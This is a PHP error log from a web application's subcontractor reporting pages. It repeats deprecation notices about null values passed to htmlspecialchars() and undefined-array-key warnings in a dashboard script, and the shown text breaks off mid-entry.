[07-Apr-2025 05:56:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:02:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:02:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:02:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:02:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:02:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:02:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:16:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:16:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:18:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:18:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:19:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:19:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:19:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:23:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:23:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:29:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:29:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:30:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:30:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:31:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:31:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:31:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:31:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:31:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:31:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:32:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:34:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:34:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:34:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:35:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:44:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:44:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:51:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:51:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 06:51:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:56:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:59:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 06:59:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 06:59:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:02:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:02:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:05:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:05:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:09:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:09:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:10:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:10:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:11:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:11:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:13:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:13:33 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:15:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:15:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:15:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:15:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:16:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:16:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:17:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:17:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:19:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:19:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:22:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:22:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:23:37 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:23:37 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:25:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:25:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:25:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:29:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:30:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:30:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:31:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:31:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:32:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:32:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:33:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:33:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:33:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:33:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:34:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:34:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:36:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:36:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:36:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:36:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:38:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:38:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:39:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:39:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:40:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:40:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:40:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:43:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:43:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:43:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:44:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:44:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:46:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:46:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:47:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:47:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:50:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:50:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:52:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:52:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:53:51 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:53:51 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:55:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:55:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:56:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:56:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:57:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:57:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:57:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:57:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:58:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:58:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 07:58:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 07:58:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 07:58:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:03:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:19:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:19:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:19:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:22:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:22:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:23:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:27:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:27:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:30:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:32:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:32:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:32:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:32:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:32:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:34:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:35:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:35:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:35:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 08:36:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:36:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:37:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:37:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is 